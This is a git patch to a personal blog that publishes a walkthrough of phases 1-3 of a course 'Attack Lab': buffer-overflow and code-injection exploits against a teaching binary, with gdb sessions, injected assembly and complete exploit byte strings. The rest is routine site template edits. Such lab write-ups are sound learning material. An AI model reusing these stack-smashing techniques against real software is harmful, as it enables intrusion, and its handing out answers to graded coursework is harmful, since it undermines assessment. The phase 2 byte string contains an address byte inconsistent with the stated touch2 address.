From 97188a509f922d4d70733c903558992488358f62 Mon Sep 17 00:00:00 2001 From: Navan Chauhan Date: Tue, 17 Oct 2023 14:53:15 -0600 Subject: update template --- Content/index.md | 2 +- Content/posts/2023-10-05-attack-lab.md | 297 ++++++++++++++++++- docs/feed.rss | 4 +- docs/index.html | 504 +-------------------------------- templates/index.html | 8 +- 5 files changed, 308 insertions(+), 507 deletions(-) diff --git a/Content/index.md b/Content/index.md index 083fdfe..fb22d38 100644 --- a/Content/index.md +++ b/Content/index.md @@ -1 +1 @@ -# 👋 Hi! +# Navan Chauhan diff --git a/Content/posts/2023-10-05-attack-lab.md b/Content/posts/2023-10-05-attack-lab.md index cfd7bd8..1f87aca 100644 --- a/Content/posts/2023-10-05-attack-lab.md +++ b/Content/posts/2023-10-05-attack-lab.md @@ -1,8 +1,8 @@ --- date: 2023-10-05 20:01 -description: Walkthrough of Attack Lab for CSCI 2400 Computer Systems +description: Walkthrough of Attack Lab Phases 1-3 for CSCI 2400 Computer Systems tags: gdb, reverse-engineering, c++, csci2400, assembly -draft: true +draft: false --- # Attack Lab @@ -20,3 +20,296 @@ Again, I like using objdump to disassemble the code. ## Phase 1 From the instructions, we know that our task is to get `CTARGET` to execute the code for `touch1` when `getbuf` executes its return statement, rather than returning to `test` + +Let us try to look into the `getbuf` from our disassembled code. + +``` +0000000000402608 : + 402608: 48 83 ec 18 sub $0x18,%rsp + 40260c: 48 89 e7 mov %rsp,%rdi + 40260f: e8 95 02 00 00 call 4028a9 + 402614: b8 01 00 00 00 mov $0x1,%eax + 402619: 48 83 c4 18 add $0x18,%rsp + 40261d: c3 +``` + +``` +402608: 48 83 ec 18 sub $0x18,%rsp +``` + +We can see that `0x18` (hex) or `24` (decimal) bytes of buffer is allocated to `getbuf` (Since, 24 bytes are being subtracted from the stack pointer). + + +Now, since we know the buffer size we can try passing the address of the touch1 function. + +``` +jxxxan@jupyter-xxxxxx8:~/lab3-attacklab-xxxxxxxxuhan/target66$ cat dis.txt | grep touch1 +000000000040261e : +``` + +We were told in our recitation that our system was little-endian (so the bytes will be in the reverse order). Otherwise, we can use python to check: + +``` +jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ python -c 'import sys; print(sys.byteorder)' +little +``` + +We have our padding size and the function we need to call, we can write it in `ctarget.l1.txt` + +``` +00 00 00 00 00 00 00 00 +00 00 00 00 00 00 00 00 +00 00 00 00 00 00 00 00 +1e 26 40 00 00 00 00 00 +``` + +``` +jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ ./hex2raw < ctarget.l1.txt | ./ctarget +Cookie: 0x3e8dee8f +Type string:Touch1!: You called touch1() +Valid solution for level 1 with target ctarget +PASS: Sent exploit string to server to be validated. +NICE JOB! +``` + +## Phase 2 + +> Phase 2 involves injecting a small amount of code as part of your exploit string. + +> Within the file ctarget there is code for a function touch2 having the following C representation: + +```c +void touch2(unsigned val) +{ + vlevel = 2; + if (val == cookie) { + printf("Touch2!: You called touch2(0x%.8x)\n", val); + validate(2); + } else { + printf("Misfire: You called touch2(0x%.8x)\n", val); + fail(2); + } + exit(0); +} +``` + +> Your task is to get CTARGET to execute the code for touch2 rather than returning to test. In this case, +however, you must make it appear to touch2 as if you have passed your cookie as its argument. + +> Recall that the first argument to a function is passed in register %rdi + +This hint tells us that we need to store the cookie in the rdi register + +``` +movq $0x3e8dee8f,%rdi +retq +``` + +To get the byte representation, we need to compile the code and then disassemble it. + +``` +jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ gcc -c phase2.s && objdump -d phase2.o +phase2.s: Assembler messages: +phase2.s: Warning: end of file not at end of a line; newline inserted + +phase2.o: file format elf64-x86-64 + + +Disassembly of section .text: + +0000000000000000 <.text>: + 0: 48 c7 c7 8f ee 8d 3e mov $0x3e8dee8f,%rdi + 7: c3 ret +``` + +Thus, the byte representation for our asm code is `48 c7 c7 8f ee 8d 3e c3` + +We also need to figure out the address to the `%rsp` register. Again, looking at the `getbuf` code + +``` +0000000000402608 : + 402608: 48 83 ec 18 sub $0x18,%rsp + 40260c: 48 89 e7 mov %rsp,%rdi + 40260f: e8 95 02 00 00 call 4028a9 + 402614: b8 01 00 00 00 mov $0x1,%eax + 402619: 48 83 c4 18 add $0x18,%rsp + 40261d: c3 ret +``` + +We need to find the address of `%rsp` after calling `` and sending a really long string. + +What we are going to do now is to add a break on `getbuf`, and run the program just after it asks us to enter a string and then find the address of `%rsp` + +``` +jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ gdb ./ctarget +GNU gdb (Ubuntu 12.1-0ubuntu1~22.04) 12.1 +Copyright (C) 2022 Free Software Foundation, Inc. +License GPLv3+: GNU GPL version 3 or later +This is free software: you are free to change and redistribute it. +There is NO WARRANTY, to the extent permitted by law. +Type "show copying" and "show warranty" for details. +This GDB was configured as "x86_64-linux-gnu". +Type "show configuration" for configuration details. +For bug reporting instructions, please see: +. +Find the GDB manual and other documentation resources online at: + . + +For help, type "help". +Type "apropos word" to search for commands related to "word"... +Reading symbols from ./ctarget... +(gdb) b getbuf +Breakpoint 1 at 0x402608: file buf.c, line 12. +(gdb) run +Starting program: /home/jxxxxn/lab3-attacklab-naxxxan/target66/ctarget +Cookie: 0x3e8dee8f + +Breakpoint 1, getbuf () at buf.c:12 +12 buf.c: No such file or directory. +(gdb) disas +Dump of assembler code for function getbuf: +=> 0x0000000000402608 <+0>: sub $0x18,%rsp + 0x000000000040260c <+4>: mov %rsp,%rdi + 0x000000000040260f <+7>: call 0x4028a9 + 0x0000000000402614 <+12>: mov $0x1,%eax + 0x0000000000402619 <+17>: add $0x18,%rsp + 0x000000000040261d <+21>: ret +End of assembler dump. +(gdb) until *0x402614 +Type string:fnaewuilrgchneaisurcngefsiduerxgecnseriuesgcbnr7ewqdt2348dn564q03278g602365bgn34890765bqv470 trq378t4378gwe +getbuf () at buf.c:15 +15 in buf.c +(gdb) x/s $rsp +0x55621b40: "fnaewuilrgchneaisurcngefsiduerxgecnseriuesgcbnr7ewqdt2348dn564q03278g602365bgn34890765bqv470 trq378t4378gwe" +(gdb) +``` + +So, the address for `%rsp` is `0x55621b40` + +Thus, we can set our `ctarget.l2.txt` as: + +``` +byte representation of ASM code +padding +address of %rsp +address of touch2 function +``` + +To get the address of `touch2` we can run: + +``` +jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ cat dis.txt | grep touch2 +000000000040264e : + 402666: 74 2a je 402692 + 4026b2: eb d4 jmp 402688 +``` + +``` +48 c7 c7 8f ee 8d 3e c3 +00 00 00 00 00 00 00 00 +00 00 00 00 00 00 00 00 +40 1b 62 55 00 00 00 00 +4e 26 b2 00 00 00 00 00 +``` + +Do note that our required padding is 24 bytes, we are only adding 16 bytes because our asm code is 8 bytes on its own. Our goal is to have a total of 24 bytes in padding, not 8 + 24 bytes, + +``` +joxxxx@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ ./hex2raw < ctarget.l2.txt | ./ctarget +Cookie: 0x3e8dee8f +Type string:Touch2!: You called touch2(0x3e8dee8f) +Valid solution for level 2 with target ctarget +PASS: Sent exploit string to server to be validated. +NICE JOB! +``` + +## Phase 3 + +> Phase 3 also involves a code injection attack, but passing a string as argument. + +> You will need to include a string representation of your cookie in your exploit string. The string should +consist of the eight hexadecimal digits (ordered from most to least significant) without a leading “0x.” + +> Your injected code should set register %rdi to the address of this string + +> When functions hexmatch and strncmp are called, they push data onto the stack, overwriting +portions of memory that held the buffer used by getbuf. As a result, you will need to be careful +where you place the string representation of your cookie. + +Because `hexmatch` and `strncmp` might overwrite the buffer allocated for `getbuf` we will try to store the data after the function `touch3` itself. + +=> The total bytes before the cookie = Buffer (0x18 in our case) + Return Address of %rsp (8 bytes) + Touch 3 (8 Bytes) = 0x18 + 8 + 8 = 28 (hex) + +We can use our address for `%rsp` from phase 2, and simply add `0x28` to it. + +=> `0x55621b40` + `0x28` = `0x55621B68` + +Again, let us get the binary representation for the ASM code: + +```asm +movq $0x55621B68, %rdi +retq +``` + +``` +jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ gcc -c phase3.s && objdump -d phase3.o +phase3.s: Assembler messages: +phase3.s: Warning: end of file not at end of a line; newline inserted + +phase3.o: file format elf64-x86-64 + + +Disassembly of section .text: + +0000000000000000 <.text>: + 0: 48 c7 c7 68 1b 62 55 mov $0x55621b68,%rdi + 7: c3 ret +``` + +Thus, our answer is going to be in the form: + +``` +asm code +padding +return address / %rsp +touch3 address +cookie string +``` + +To quickly get the address for `touch3` + +``` +jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ cat dis.txt | grep touch3 +0000000000402763 : + 402781: 74 2d je 4027b0 + 4027d3: eb d1 jmp 4027a6 +``` + +We need to use an ASCII to Hex converter to convert the cookie string into hex. + +``` +jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ echo -n 3e8dee8f | xxd -p +3365386465653866 +``` + +Thus, our cookie string representation is `33 65 38 64 65 65 38 66` + +``` +48 c7 c7 68 1B 62 55 c3 +00 00 00 00 00 00 00 00 +00 00 00 00 00 00 00 00 +40 1b 62 55 00 00 00 00 +63 27 40 00 00 00 00 00 +33 65 38 64 65 65 38 66 +``` + +``` +jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ ./hex2raw < ctarget.l3.txt | ./ctarget +Cookie: 0x3e8dee8f +Type string:Touch3!: You called touch3("3e8dee8f") +Valid solution for level 3 with target ctarget +PASS: Sent exploit string to server to be validated. +NICE JOB! +``` + +Phases 1-3 Complete. diff --git a/docs/feed.rss b/docs/feed.rss index 15b5cd7..90fcf9c 100644 --- a/docs/feed.rss +++ b/docs/feed.rss @@ -4,8 +4,8 @@ Navan's Archive Rare Tips, Tricks and Posts https://web.navan.dev/en - Tue, 17 Oct 2023 02:50:51 -0000 - Tue, 17 Oct 2023 02:50:51 -0000 + Tue, 17 Oct 2023 11:59:32 -0000 + Tue, 17 Oct 2023 11:59:32 -0000 250 diff --git a/docs/index.html b/docs/index.html index 2a900d6..3f01c4f 100644 --- a/docs/index.html +++ b/docs/index.html @@ -42,9 +42,10 @@
-

👋 Hi!

+

Navan Chauhan

+

Recent Posts

-
  • A new method to blog
    • -
      -
    • Writing posts in markdown using pen and paper
      • -
    • Published On: 2022-11-07 23:29
      • -
    • Tags: - - Python, - - OCR, - - Microsoft Azure - -
    - - -
  • Why You No Host?
    • -
      -
    • Why you should self-host with YunoHost
      • -
    • Published On: 2022-08-05 14:46
      • -
    • Tags: - - Self-Hosted, - - YunoHost - -
    - - -
  • Building a Similar Movies Recommendation System
    • -
      -
    • Building a Content Based Similar Movies Recommendatiom System
      • -
    • Published On: 2022-05-21 17:56
      • -
    • Tags: - - Python, - - Transformers, - - Recommendation-System - -
    - - -
  • Making a Crude ML Powered Chatbot in Swift using CoreML
    • -
      -
    • Writing a simple Machine-Learning powered Chatbot (or, daresay virtual personal assistant ) in Swift using CoreML.
      • -
    • Published On: 2021-06-27 23:26
      • -
    • Tags: - - Swift, - - CoreML, - - NLP - -
    - - -
  • Cheminformatics on the Web (2021)
    • -
      -
    • Summarising Cheminformatics on the web in 2021.
      • -
    • Published On: 2021-06-26 13:04
      • -
    • Tags: - - Cheminformatics, - - JavaScript - -
    - - -
  • Basic NFC Music Cards for iOS
    • -
      -
    • Basic NFC Music Cards on iOS with Shortcuts
      • -
    • Published On: 2021-06-25 16:20
      • -
    • Tags: - - iOS, - - Shortcuts, - - Fun - -
    - - -
  • Posting Blog Posts as Twitter Threads Part 1/n
    • -
      -
    • Converting Posts to Twitter Threads
      • -
    • Published On: 2021-06-25 00:08
      • -
    • Tags: - - Python, - - Twitter, - - Eh - -
    - - -
  • RSS Feed written in HTML + JavaScript
    • -
      -
    • Short code-snippet for an RSS feed, written in HTML and JavaScript
      • -
    • Published On: 2020-12-01 20:52
      • -
    • Tags: - - Tutorial, - - Code-Snippet, - - HTML, - - JavaScript - -
    - - -
  • Generating HTTPS Certificate using DNS a Challenge through Let's Encrypt
    • -
      -
    • Short code-snippet to generate HTTPS certificates using the DNS Challenge through Lets Encrypt for a web-server using DuckDNS.
      • -
    • Published On: 2020-11-17 15:04
      • -
    • Tags: - - Tutorial, - - Code-Snippet, - - Web-Development - -
    - - -
  • Trying Different Camera Setups
    • -
      -
    • Comparison of different cameras setups for using as a webcam and tutorials for the same.
      • -
    • Published On: 2020-10-11 16:12
      • -
    • Tags: - - Tutorial, - - Review, - - Webcam - -
    - - -
  • Introduction to AR.js and Natural Feature Tracking
    • -
      -
    • An introduction to AR.js and NFT
      • -
    • Published On: 2020-08-01 15:43
      • -
    • Tags: - - Tutorial, - - AR.js, - - JavaScript, - - Augmented-Reality - -
    - - -
  • Installing RDKit on Google Colab
    • -
      -
    • Install RDKit on Google Colab with one code snippet.
      • -
    • Published On: 2020-07-01 14:23
      • -
    • Tags: - - Tutorial, - - Code-Snippet, - - Colab - -
    - - -
  • Compiling AutoDock Vina on iOS
    • -
      -
    • Compiling AutoDock Vina on iOS
      • -
    • Published On: 2020-06-02 23:23
      • -
    • Tags: - - iOS, - - Jailbreak, - - Cheminformatics, - - AutoDock Vina, - - Molecular-Docking - -
    - - -
  • Workflow for Lightning Fast Molecular Docking Part One
    • -
      -
    • This is my workflow for lightning fast molecular docking.
      • -
    • Published On: 2020-06-01 13:10
      • -
    • Tags: - - Code-Snippet, - - Molecular-Docking, - - Cheminformatics, - - Open-Babel, - - AutoDock Vina - -
    - - -
  • Compiling Open Babel on iOS
    • -
      -
    • Compiling Open Babel on iOS
      • -
    • Published On: 2020-05-31 23:30
      • -
    • Tags: - - iOS, - - Jailbreak, - - Cheminformatics, - - Open-Babel - -
    - - -
  • Fixing X11 Error on macOS Catalina for AmberTools 18/19
    • -
      -
    • Fixing Could not find the X11 libraries; you may need to edit config.h, AmberTools macOS Catalina
      • -
    • Published On: 2020-04-13 11:41
      • -
    • Tags: - - Molecular-Dynamics, - - macOS - -
    - - -
  • Possible Drug Candidates for COVID-19
    • -
      -
    • COVID-19, has been officially labeled as a pandemic by the World Health Organisation. This paper presents cloperastine and vigabatrin as two possible drug candidates for combatting the disease along with the process by which they were discovered.
      • -
    • Published On: 2020-03-17 17:40
      • -
    • Tags: - - publication, - - pre-print - -
    - - -
  • Is it possible to programmatically generate Vaporwave?
    • -
      -
    • This paper is about programmaticaly generating Vaporwave.
      • -
    • Published On: 2020-03-14 22:23
      • -
    • Tags: - - publication, - - pre-print - -
    - - -
  • Making My First Vaporwave Track (Remix)
    • -
      -
    • I made my first vaporwave remix
      • -
    • Published On: 2020-03-08 23:17
      • -
    • Tags: - - Vaporwave, - - Music - -
    - - -
  • Tinkering with an Android TV
    • -
      -
    • Tinkering with an Android TV
      • -
    • Published On: 2020-03-03 18:37
      • -
    • Tags: - - Android-TV, - - Android - -
    - - -
  • How to setup Bluetooth on a Raspberry Pi
    • -
      -
    • Connecting to Bluetooth Devices using terminal, tested on Raspberry Pi Zero W
      • -
    • Published On: 2020-01-19 15:27
      • -
    • Tags: - - Code-Snippet, - - tutorial, - - Raspberry-Pi, - - Linux - -
    - - -
  • Creating a Custom Image Classifier using Turicreate to detect Smoke and Fire
    • -
      -
    • Tutorial on creating a custom Image Classifier using Turicreate and a dataset from Kaggle
      • -
    • Published On: 2020-01-16 10:36
      • -
    • Tags: - - Tutorial, - - Colab, - - Turicreate - -
    - - -
  • Setting up Kaggle to use with Google Colab
    • -
      -
    • Tutorial on setting up kaggle, to use with Google Colab
      • -
    • Published On: 2020-01-15 23:36
      • -
    • Tags: - - Tutorial, - - Colab, - - Turicreate, - - Kaggle - -
    - - -
  • Converting between image and NumPy array
    • -
      -
    • Short code snippet for converting between PIL image and NumPy arrays.
      • -
    • Published On: 2020-01-14 00:10
      • -
    • Tags: - - Code-Snippet, - - Tutorial - -
    - - -
  • Building a Fake News Detector with Turicreate
    • -
      -
    • In this tutorial we will build a fake news detecting app from scratch, using Turicreate for the machine learning model and SwiftUI for building the app
      • -
    • Published On: 2019-12-22 11:10
      • -
    • Tags: - - Tutorial, - - Colab, - - SwiftUI, - - Turicreate - -
    - - -
  • Polynomial Regression Using TensorFlow
    • -
      -
    • Polynomial regression using TensorFlow
      • -
    • Published On: 2019-12-16 14:16
      • -
    • Tags: - - Tutorial, - - Tensorflow, - - Colab - -
    - - -
  • Making Predictions using Image Classifier (TensorFlow)
    • -
      -
    • Making predictions for image classification models built using TensorFlow
      • -
    • Published On: 2019-12-10 11:10
      • -
    • Tags: - - Tutorial, - - Tensorflow, - - Code-Snippet - -
    - - -
  • Creating a Custom Image Classifier using Tensorflow 2.x and Keras for Detecting Malaria
    • -
      -
    • Tutorial on creating an image classifier model using TensorFlow which detects malaria
      • -
    • Published On: 2019-12-08 14:16
      • -
    • Tags: - - Tutorial, - - Tensorflow, - - Colab - -
    - - -
  • Splitting ZIPs into Multiple Parts
    • -
      -
    • Short code snippet for splitting zips.
      • -
    • Published On: 2019-12-08 13:27
      • -
    • Tags: - - Code-Snippet, - - Tutorial - -
    - - -
  • Image Classifier With Teachable Machines
    • -
      -
    • Tutorial on creating a custom image classifier quickly with Google Teachable Machines
      • -
    • Published On: 2019-12-04 18:23
      • -
    • Tags: - - Tutorial - -
    - - -
  • Detecting Driver Fatigue, Over-Speeding, and Speeding up Post-Accident Response
    • -
      -
    • This paper is about Detecting Driver Fatigue, Over-Speeding, and Speeding up Post-Accident Response.
      • -
    • Published On: 2019-05-14 02:42
      • -
    • Tags: - - publication - -
    - - -
  • Creating your own custom theme for Snowboard or Anemone
    • -
      -
    • Tutorial on creating your own custom theme for Snowboard or Anemone
      • -
    • Published On: 2019-05-05 12:34
      • -
    • Tags: - - Tutorial, - - Jailbreak, - - Designing, - - Snowboard, - - Anemone - -
    - - -
  • Hello World
    • -
      -
    • My first post.
      • -
    • Published On: 2019-04-16 17:39
      • -
    • Tags: - - hello-world - -
    - - -
  • Experiments
    • -
      -
    • Just a markdown file for all experiments related to the website
      • -
    • Published On: 2010-01-24 23:43
      • -
    • Tags: - - Experiment - -
    + +For all posts go to Posts -
    diff --git a/templates/index.html b/templates/index.html index a651ea2..a83e6c3 100644 --- a/templates/index.html +++ b/templates/index.html @@ -6,8 +6,9 @@
    {{ content}} +

    Recent Posts

      -{% for post in posts %} +{% for post in posts[:5] %}
    • {{ post.title }}
      • {{ post.description}}
        • @@ -20,5 +21,8 @@ {% endfor %}
      + +For all posts go to Posts +
    -{% endblock %} \ No newline at end of file +{% endblock %} -- cgit v1.2.3